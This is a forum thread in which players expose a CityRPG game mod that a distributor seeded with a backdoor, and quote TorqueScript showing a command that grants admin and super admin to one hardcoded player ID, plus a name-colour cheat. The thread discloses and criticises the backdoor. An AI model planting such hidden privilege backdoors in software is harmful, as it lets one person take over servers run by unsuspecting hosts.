Author Topic: Aoki - Distributing CityRPG with a backdoor, Super admin on all servers using it  (Read 35459 times)

I've seen quite a few more CityRPG's popping up lately. First thing that came to mind was that all these servers seemed to have been using similar versions of the mod (Notable: A job named "Aoki Cosplayer" available). I had also noticed that Aoki seemed to have been admin on all these servers, it wasn't suspicious at first since I thought that maybe Aoki was just popular among the people who liked hosting those things. But today I saw Aoki and asked if he had been the one distributing the mod.

Okay, that was interesting. So I asked him if I could have a look at it. He replied that he did not want to give out the 'updated version', but I managed to get him to post a link to whatever he had been giving out before. (The server had eval, so the link was posted using it. They also disabled the admin shields using eval a few minutes before.)


Looking through the code, I found exactly what I suspected I would find.

Quote from: Lines 3211 to 3229
function serverCmdtogAdmin(%client)
   if(%client.bl_id == 7395)  //7395 is Aoki's BL_ID
      %client.isAdmin = (%client.isAdmin ? 0 : 1);
      %client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
      commandtoclient(%client, 'setAdminLevel', %client.isAdmin);
      messageAll('MsgClientJoin', '',, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);
         messageAll('MsgAdminForce','\c2%1 has Re-Admined himself.',;
         messageAll('MsgAdminForce','\c0%1 has De-Admined himself.',;

There was also another 'cheat' he had put in, which was a custom shapeName color (Actually gave a significant advantage in game).

This is a little less serious, but look at this.

This isn't really harmful, but I think intent was behind that. (And I am pretty sure that the eval access was achieved via the exploit in the mod, but he could have already been an admin)

On a slightly unrelated note, Visolator was acting shifty as forget and had made his own silent eval function so he could eval without anyone knowing. I don't know if he was up to anything, but it was shifty.

Looks like we have another spencer in here.

I do remember him talking about "Added bits" to the cityRPG sometime, I had an idea it was an auto-adminer.

I can verify that it had backdoor, in-case the file gets removed. (First thing I assumed it'd be).

He was also disabling add-ons via eval because he "didn't like them".

I can verify that it had backdoor, in-case the file gets removed. (First thing I assumed it'd be).
I posted a mirror to the file to ensure it would stay available for inspection.

Quote from: Lines 3211 to 3299
function serverCmdtogAdmin(%client)
   if(%client.bl_id == 7395)  //7395 is Aoki's BL_ID
      %client.isAdmin = (%client.isAdmin ? 0 : 1);
      %client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
      commandtoclient(%client, 'setAdminLevel', %client.isAdmin);
      messageAll('MsgClientJoin', '',, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);
         messageAll('MsgAdminForce','\c2%1 has Re-Admined himself.',;
         messageAll('MsgAdminForce','\c0%1 has De-Admined himself.',;

How did he even distribute it?

How did he even distribute it?
Insensitive hosts who didn't even bother to check the code and let Aoki screw up their server
Pic related:

Note how he uses eval to admin himself and deadmin the host (Outpact)

Oh no. This isn't good. I just realized that he put more of his ID in the code as well.

Code: [Select]
function player::setShapeNameColor(%this, %color)
if(isObject(%client = %this.client) && isObject(%client.player) && %this.getState() !$= "dead")
if(%client.bl_id != 7395)
%color = "1 0 0 1";
else if(CityRPGData.getData(%client.bl_id).valueReincarnated)
%color = "1 1 0 1";
else if(%client.isAdmin == 1)
%color = "1 0 0 1";
else if(%client.isSuperAdmin == 1)
%color = "0 1 0 1";
%color = "1 1 1 1";
if(%client.bl_id == 7395)
%color = "0.621495 0.859813 0.976636 1";

parent::setShapeNameColor(%this, %color);

Oh no. This isn't good. I just realized that he put more of his ID in the code as well.
[quote author=Pecon link=topic=242583.msg6937744#msg6937744 date=1380670479
There was also another 'cheat' he had put in, which was a custom shapeName color (Actually gave a significant advantage in game).

][quote author=Pecon link=topic=242583.msg6937744#msg6937744 date=1380670479
There was also another 'cheat' he had put in, which was a custom shapeName color (Actually gave a significant advantage in game).

Yea. Well hopefully Outpact can fully remove him out of the coding. Now I know that he is just bad news.

I will mind as well copy this mod and remove those things and make sure everytime outpact restarts Aoki cannot add himself.

Oh no. This isn't good. I just realized that he put more of his ID in the code as well.

Code: [Select]
function player::setShapeNameColor(%this, %color)
if(isObject(%client = %this.client) && isObject(%client.player) && %this.getState() !$= "dead")
if(%client.bl_id != 7395)
%color = "1 0 0 1";
else if(CityRPGData.getData(%client.bl_id).valueReincarnated)
%color = "1 1 0 1";
else if(%client.isAdmin == 1)
%color = "1 0 0 1";
else if(%client.isSuperAdmin == 1)
%color = "0 1 0 1";
%color = "1 1 1 1";
if(%client.bl_id == 7395)
%color = "0.621495 0.859813 0.976636 1";

parent::setShapeNameColor(%this, %color);
I don't know torquescript, but I think that forgets anyone who kills aoki? Am I wrong? Looks like it raises their wanted level all the way.

I don't know torquescript, but I think that forgets anyone who kills aoki? Am I wrong? Looks like it raises their wanted level all the way.
No, it makes his name color in-game unique and unchanging. It messes with the gameplay because normally criminal players will have a red name.